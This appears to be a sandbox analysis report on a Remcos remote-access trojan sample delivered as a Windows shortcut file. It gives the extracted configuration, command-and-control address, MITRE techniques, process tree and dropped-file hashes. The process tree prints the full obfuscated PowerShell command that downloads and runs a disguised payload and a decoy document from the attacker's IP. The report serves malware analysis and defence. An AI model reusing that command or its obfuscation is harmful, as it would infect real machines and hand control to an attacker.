remcos | dc465334ab894d0f9247004d29eea52a933cb565c3bb5b538c10e9923f0f5489

Analysis

max time kernel
147s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240802-uk
resource tags

arch:x64arch:x86image:win10v2004-20240802-uklocale:uk-uaos:windows10-2004-x64systemwindows
submitted
10-09-2024 19:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

lnk.lnk
Size

26KB
MD5

6dddbea89b9df67a2a3e66e5937f78ff
SHA1

ba62ad24df8a06626919cbf8ada946bd49d2d92e
SHA256

dc465334ab894d0f9247004d29eea52a933cb565c3bb5b538c10e9923f0f5489
SHA512

46345a8e638d22ccc019f3005efc0742ecfb24bbac47f47bbfccb02868b7aa5ef3a8f8483cc0646ab50914fa596c2263bfa5305b01c63a675f0d52657ea2d904
SSDEEP

48:88muavUQSAlHqaBxkn/NQxCHXZTOxkn/vhf/dCZZGXu/dZZIa7x:88y8alHqaBGQxCpSy3uqQ

Score

10^/10

remcos rudolfhess discovery rat

Malware Config

Extracted

Family

remcos

Botnet

rudolfhess

154.216.17.56:20790

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-3TEAZT
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	3656	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

pid	Process
2296	pythonw.exe
1536	pythonw.exe

Loads dropped DLL 5 IoCs

pid	Process
2296	pythonw.exe
2296	pythonw.exe
1536	pythonw.exe
1536	pythonw.exe
1536	pythonw.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1536 set thread context of 548	1536	pythonw.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3536	WINWORD.EXE
3536	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3656	powershell.exe
3656	powershell.exe
2296	pythonw.exe
1536	pythonw.exe
1536	pythonw.exe
548	cmd.exe
548	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1536	pythonw.exe
548	cmd.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3656	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE
3536	WINWORD.EXE

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 3060 wrote to memory of 3656	3060	cmd.exe	85
PID 3060 wrote to memory of 3656	3060	cmd.exe	85
PID 3656 wrote to memory of 2296	3656	powershell.exe	99
PID 3656 wrote to memory of 2296	3656	powershell.exe	99
PID 2296 wrote to memory of 1536	2296	pythonw.exe	100
PID 2296 wrote to memory of 1536	2296	pythonw.exe	100
PID 3656 wrote to memory of 3536	3656	powershell.exe	101
PID 3656 wrote to memory of 3536	3656	powershell.exe	101
PID 1536 wrote to memory of 548	1536	pythonw.exe	102
PID 1536 wrote to memory of 548	1536	pythonw.exe	102
PID 1536 wrote to memory of 548	1536	pythonw.exe	102
PID 1536 wrote to memory of 548	1536	pythonw.exe	102
PID 548 wrote to memory of 3136	548	cmd.exe	107
PID 548 wrote to memory of 3136	548	cmd.exe	107
PID 548 wrote to memory of 3136	548	cmd.exe	107
PID 548 wrote to memory of 3136	548	cmd.exe	107
PID 548 wrote to memory of 3136	548	cmd.exe	107

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\lnk.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3060
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo SdiIGnQMLoNvVxnGWeakFFkqnnGNlPtfFrLgQ; echo lYPjTMszVHaxVweMhRMgWeFsfPMhFaOikddQysogzEjjQmjcPP; echo qqTyYnCbYGGnJLFgiFGMLrnaJlRuXLIBrjdEhjRUEogDJAisuab; if (-not(Test-Path 'whatsapp.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri ht''tp'':''/''/''1''54''.''21''6''.''17''.''56''/whatsapp.zip -OutFile whatsapp.zip}; echo IhatdGoTCkdFhwcpEETroJYZBzkKjtvLTIDrFjcIvAFUKeB; Expand-Archive -Path whatsapp.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/pythonw.exe; echo AwulETjKvZrgfqXHzySrKyKrWVMZciavsecDgdxDSMKgzJipRkS; &(Ge''t-Com''ma''nd in???e-webre***) -uri ht''tp'':''/''/''1''54''.''21''6''.''17''.''56''/vandal/JEO1511.gr_Matyash.YA.O._tilesnie.doc -OutFile JEO1511.gr_Matyash.YA.O._tilesnie.doc; echo jYivsRBVKjbQIMRpnMctQsjOSMMylzvLdURENNJnFmfYzEKuFziTYRD; s''t''a''rt JEO1511.gr_Matyash.YA.O._tilesnie.doc
  2⤵
  - Blocklisted process makes network request
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3656
- - C:\Users\Admin\AppData\Roaming\SecurityCheck\pythonw.exe
    "C:\Users\Admin\AppData\Roaming\SecurityCheck\pythonw.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2296
  - - C:\Users\Admin\AppData\Roaming\xgpower\pythonw.exe
      C:\Users\Admin\AppData\Roaming\xgpower\pythonw.exe
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:1536
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of WriteProcessMemory
        
        PID:548
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3136
- - C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Roaming\JEO1511.gr_Matyash.YA.O._tilesnie.doc" /o ""
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
    PID:3536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TCD2A12.tmp\iso690.xsl

Filesize
263KB

MD5
ff0e07eff1333cdf9fc2523d323dd654

SHA1
77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

SHA256
3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

SHA512
b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j2uytnxe.vsz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\f255b425

Filesize
1.2MB

MD5
65f21fcc2fe93ad7348c64729f1f5a91

SHA1
2904cacbd5b8d3318a36788cd76255c6c212f157

SHA256
ce1f23b1d9931bb13dd82ef173b39e0778f3c1750472303ca9a8bf43c0102419

SHA512
a2af831a29bd582755d1ea2cafe785291930a15a1b549f2cd2783787b89844029bda89431cfb8ec9758eccea022d0bcfc73ef1ab95a80457c090e7c3e61a962c

Download Submit
C:\Users\Admin\AppData\Roaming\JEO1511.gr_Matyash.YA.O._tilesnie.doc

Filesize
26KB

MD5
9590ff205dd357652eaf96866b831a9f

SHA1
01e625518f6309aebaffee2ef9892efcf185dee6

SHA256
4ea65c013ee7657f9886c87aed97f69d1e102585b3f2772aca6cd021498532c8

SHA512
b219caa709cc51045c52a46841018890ebdc3b36b57e50c51dbc9e04ec927384dcfda4953fd59abb7b5e246d7b03045041ca40d861dc38163ad9c5131dee1320

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

Filesize
452B

MD5
6c58b30e6777202f01f2f80a398f929b

SHA1
ec7b6ace8ed5cd45be778d2bea3a9cb27bec8d9d

SHA256
72e45c77ca964ca7ecbb406c9ac66b2c0d14a92db423c40063a6c249ea06aa59

SHA512
c968656c9ccb085b91764278bc3fedcffb079b68b5d579207dd587d3a7b3ac5d1dac5de194849dc79b5b2c4ddff40e2a622ac835443a313f92d935b06c0ceeb6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
3KB

MD5
8faee9ab060912314472d1ea87b0e4ad

SHA1
36e24ba6b1d5542f3c549f807d942b1057725952

SHA256
080c1473586bc729a64a77023787fc67b2b5750a5bdafc7b95ac8ae790a8e7d9

SHA512
22b5f60b27201d55c77e29065e9f94eab19e720f0e11428793ff4f3f939efc17b874fb88840fc778f2ebbedc2dcff512501162b9dacfa1912335fef0cec68e97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
4KB

MD5
6357094f4ddab0a0475b530f03541d7e

SHA1
a97c34719fcd2c8910923bcf19d372949a221039

SHA256
124591cf57ac82a66a883db6c03d110e5d07755eb29307270351ebeb56ae8e85

SHA512
bb73c7342048f076ebf46bc3d96316fb7a13a3006268084632584fc21345466d426170a7c0fb7c65e0e353a0c19d0afc4747cf59b8dc9671c318f1d6b3af186e

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\VCRUNTIME140.dll

Filesize
106KB

MD5
49c96cecda5c6c660a107d378fdfc3d4

SHA1
00149b7a66723e3f0310f139489fe172f818ca8e

SHA256
69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc

SHA512
e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\loav

Filesize
89KB

MD5
ae47a539d4cad82263ef710b09ec9f76

SHA1
f767cfd657ccf3662b1421743c0d0af2f08da74b

SHA256
0aed59bf51f1bd70dcdd99b28546237f171610260adddcff4cab0895e0f4e151

SHA512
bc9fd5a3a38119c9a51afa991a6684e0d8861d4f79073447f036e4fdb79efe49ee047c91abe497fb95a0a9d3e154d6b74c644a92050613d650dbbe2189218c5a

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\python310.dll

Filesize
4.3MB

MD5
86b62d7719da6ab943216c5aa6baa4f4

SHA1
b89e6218105e13cc514ca9238286941a1d1f1e17

SHA256
11204ec01b1f723792793ce9108ca5329112458f6c89495cf305cf8e581d48d4

SHA512
7a52d00d974655b74e5fcdadf064d0c6314b9ea9a3f8760bd5d6569cdf885c4206b0235b25b0fa41c12b88dde5095ff3bb7153d69b34cd8c9c9f7c0b1a449bc5

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\pythonw.exe

Filesize
94KB

MD5
9a4cc0d8e7007f7ef20ca585324e0739

SHA1
f3e5a2e477cac4bab85940a2158eed78f2d74441

SHA256
040d121a3179f49cd3f33f4bc998bc8f78b7f560bfd93f279224d69e76a06e92

SHA512
54636a48141804112f5b4f2fc70cb7c959a041e5743aeedb5184091b51daa1d1a03f0016e8299c0d56d924c6c8ae585e4fc864021081ffdf1e6f3eab11dd43b3

Download Submit
C:\Users\Admin\AppData\Roaming\SecurityCheck\vojrwad

Filesize
1.0MB

MD5
7fd3cf60053c7fc6e5ef75ef32484359

SHA1
18c52483dbc2acea6e495ade72a4d508e3832443

SHA256
29a314cd7b6b3a63e5f8074fdd980ecd2fef97de1a36abfd9a3dc1b76d953c7e

SHA512
fc5103b0e1e388b9207121cf94b4a22926e08e50f21d80bdfa0ed4d9213471e6686f0f5b75fdf782126ae2365f8d0a44dde3d13a329ac098a2c9a5dac1e9dce2

Download Submit
memory/548-245-0x0000000074DE0000-0x0000000074F5B000-memory.dmp

Filesize
1.5MB

Download
memory/548-107-0x00007FFC0FE10000-0x00007FFC10005000-memory.dmp

Filesize
2.0MB

Download
memory/1536-72-0x00007FFC00550000-0x00007FFC006C2000-memory.dmp

Filesize
1.4MB

Download
memory/1536-104-0x00007FFC00550000-0x00007FFC006C2000-memory.dmp

Filesize
1.4MB

Download
memory/2296-48-0x00007FFBE68C0000-0x00007FFBE6A32000-memory.dmp

Filesize
1.4MB

Download
memory/3136-248-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-251-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-254-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-255-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-250-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-256-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3136-247-0x00007FFC0FE10000-0x00007FFC10005000-memory.dmp

Filesize
2.0MB

Download
memory/3136-257-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/3536-80-0x00007FFBCFE90000-0x00007FFBCFEA0000-memory.dmp

Filesize
64KB

Download
memory/3536-78-0x00007FFBCFE90000-0x00007FFBCFEA0000-memory.dmp

Filesize
64KB

Download
memory/3536-81-0x00007FFBCDDD0000-0x00007FFBCDDE0000-memory.dmp

Filesize
64KB

Download
memory/3536-76-0x00007FFBCFE90000-0x00007FFBCFEA0000-memory.dmp

Filesize
64KB

Download
memory/3536-77-0x00007FFBCFE90000-0x00007FFBCFEA0000-memory.dmp

Filesize
64KB

Download
memory/3536-79-0x00007FFBCFE90000-0x00007FFBCFEA0000-memory.dmp

Filesize
64KB

Download
memory/3536-82-0x00007FFBCDDD0000-0x00007FFBCDDE0000-memory.dmp

Filesize
64KB

Download
memory/3656-20-0x0000014D9C1A0000-0x0000014D9C1B2000-memory.dmp

Filesize
72KB

Download
memory/3656-75-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-2-0x00007FFBF1923000-0x00007FFBF1925000-memory.dmp

Filesize
8KB

Download
memory/3656-21-0x0000014D83E50000-0x0000014D83E5A000-memory.dmp

Filesize
40KB

Download
memory/3656-19-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-17-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-16-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-15-0x00007FFBF1923000-0x00007FFBF1925000-memory.dmp

Filesize
8KB

Download
memory/3656-14-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-13-0x00007FFBF1920000-0x00007FFBF23E1000-memory.dmp

Filesize
10.8MB

Download
memory/3656-8-0x0000014D9C0F0000-0x0000014D9C112000-memory.dmp

Filesize
136KB

Download